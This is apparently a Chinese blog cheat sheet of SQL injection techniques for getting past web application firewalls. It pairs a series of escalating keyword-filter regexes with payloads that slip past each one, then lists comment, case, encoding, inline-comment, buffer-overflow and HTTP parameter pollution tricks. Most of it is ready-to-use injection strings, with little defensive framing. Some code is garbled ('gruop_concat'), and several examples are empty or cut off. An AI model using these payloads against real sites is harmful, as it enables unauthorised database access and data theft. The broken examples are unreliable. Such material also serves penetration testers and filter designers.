整理下关于SQL注入绕过的一些姿势。欢迎大牛补充 !^—^!
0x01 绕过waf思路
从第一步起,一点一点去分析,然后绕过。
过滤 and,or
123preg_match('/(and|or)/i', $id)Filtered injection: 1 or 1 = 1 1 and 1 = 1Bypassed injection: 1 || 1 = 1 1 && 1 = 1过滤 and, or, union
123preg_match('/(and|or|union)/i', $id)Filtered injection: union select user, password from usersBypassed injection: 1 || (select user from users where user_id = 1) = 'admin'过滤 and, or, union, where
123preg_match('/(and|or|union|where)/i', $id)Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'Bypassed injection: 1 || (select user from users limit 1) = 'admin'过滤 and, or, union, where, limit
123preg_match('/(and|or|union|where|limit)/i', $id)Filtered injection: 1 || (select user from users limit 1) = 'admin'Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'过滤 and, or, union, where, limit, group by
123preg_match('/(and|or|union|where|limit|group by)/i', $id)Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1过滤 and, or, union, where, limit, group by, select
1234preg_match('/(and|or|union|where|limit|group by|select)/i', $id)Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'Bypassed injection: 1 || substr(user,1,1) = 'a'过滤 and, or, union, where, limit, group by, select, ‘
12345preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1Bypassed injection: 1 || user_id is not nullBypassed injection: 1 || substr(user,1,1) = 0x61Bypassed injection: 1 || substr(user,1,1) = unhex(61)过滤 and, or, union, where, limit, group by, select, ‘, hex
123preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)Filtered injection: 1 || substr(user,1,1) = unhex(61)Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))过滤 and, or, union, where, limit, group by, select, ‘, hex, substr
123preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))Bypassed injection: 1 || lpad(user,7,1)过滤 and, or, union, where, limit, group by, select, ‘, hex, substr, 空格
123preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)Filtered injection: 1 || lpad(user,7,1)ypassed injection: 1%0b||%0blpad(user,7,1)
0x02 正则绕过
根据正则的的模糊匹配特性绕过,比如过滤了’=’
filtered injection: 1 or 1 = 1
Bypassed injection: 1 or 1,1 or ‘1’,1 or char(97)
0x03 通用绕过
1.注释符
?id=1+un//ion+se//lect+1,2,3–
2.大小写
?id=1+UnIoN//SeLecT//1,2,3–
3.关键字替换
有些waf等使用preg_replace替换了SQL关键字
有时候注释符’/**/‘可能被过滤,也可以使用%0b绕过
4.编码
一个经典的脚本:Nukesentinel.php
|
|
5.缓冲区溢出
http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10–
6.内联注释(mysql)
|
|
0x04 高级绕过
1.HPP(http参数污染)
举个例子:
index.php?par1=val1&par1=val2
| web server | par1 |
| :— | :— |
| ASP.NET/IIS | val1,val2 |
| ASP/IIS | val1,val2 |
| PHP/Apache | val2 |
| JSP/Tomcat | val1 |
eg:
在ASP/ASP.NET
的环境下
2.HPC(http参数污染)
RFC2396定义了如下一些字符:
不同的Web服务器处理处理构造得特殊请求时有不同的逻辑:
| Query String | Apache/2.2.16,PHP/5.3.3 | IIS6/ASP |
| :— | :— | :— |
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test%00=1 | test= | test=1 |
| ?test=1%001 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |
eg: